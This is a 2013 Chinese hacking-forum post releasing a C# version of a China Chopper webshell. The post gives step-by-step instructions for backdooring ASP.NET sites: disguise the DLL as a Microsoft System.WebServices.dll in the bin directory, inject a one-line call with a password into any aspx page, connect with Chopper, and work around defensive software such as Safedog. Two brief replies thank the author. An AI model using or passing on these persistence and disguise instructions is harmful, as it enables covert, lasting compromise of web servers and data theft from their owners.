搜索
查看: 776|回复: 2

C#版菜刀一句话 ChopperServerForCsharp Released

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-27 09:27:52 来自手机 | 显示全部楼层 |阅读模式
0x01 前言
首先解释一下为什么要做这个玩意:
众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来Jscript市场很低,遇到的.net站基本都是C#。新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接出局。如果不能提权的话,那么过一段时间再打开往往面临的是大大的404。
综上,利用.net会加载bin目录中的类库的特点和命名空间这个神奇的东西编写了这个程序,将文件放在bin目录并在文件中插入调用代码即可。可能你会说放在bin目录不是更明显?这里要说明一点,相信许多的管理猿/站长都没有查看bin目录的习惯,而管理猿/站长并不一定是C#程序猿。假如你是一个这样的管理猿/站长,看到一个名叫System.WebServices.dll、版权写的是微软、产品名称是.Net FrameWork的类库你会不会删?
当然这方法瞒不过聪明的管理猿,但传统方式同样瞒不住。可能这东西有些鸡肋,但在某些时候未必没有用处。
另外,限于菜刀提供的接口,程序功能远远不全,对应的外壳正在开发中,届时会带有更强的功能,敬请期待。
(后续将提供的功能:一键脱裤、注册表管理、以其他用户权限执行程序等)
0x02 使用说明
一、将System.WebServices.dll复制到网站根目录的bin子目录中。
二、在任意.net页面插入<%WebServices.ShowRunnerVersion();%>并访问,出现授权与免责声明页面表示调用成功。
三、删除第二步中插入的代码,重新插入<%WebServices.InitalizeWebServices("fuck");%>,其中fuck为菜刀连接所需的密码。
四、使用中国菜刀连接,类型选择Customize,密码为第三步中约定的密码。
0x03 注意
一、程序无视预编译,代码可以插在任意aspx页面内,如果连接失败则是因为在先前代码中(.cs或预编译之后的库中)调用了Response.End()方法,请更换页面。如果是插入到页面对应的.cs代码文件之中,请去除脚本标记<%%>之后插入到Page_Load方法对应的代码块之中。
二、由于菜刀对于Customize的连接方式是非加密的,所以安全狗等防御软件会拦截查询数据库等操作,遇到此情况请换用.net菜刀一句话或使用其他脚本查询。
下载地址
专业回帖 该用户已被删除
发表于 2013-10-27 10:10:27 | 显示全部楼层
过来看看的
专业回帖 该用户已被删除
发表于 2013-10-27 10:24:59 | 显示全部楼层
不知该说些什么。。。。。。就是谢谢
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表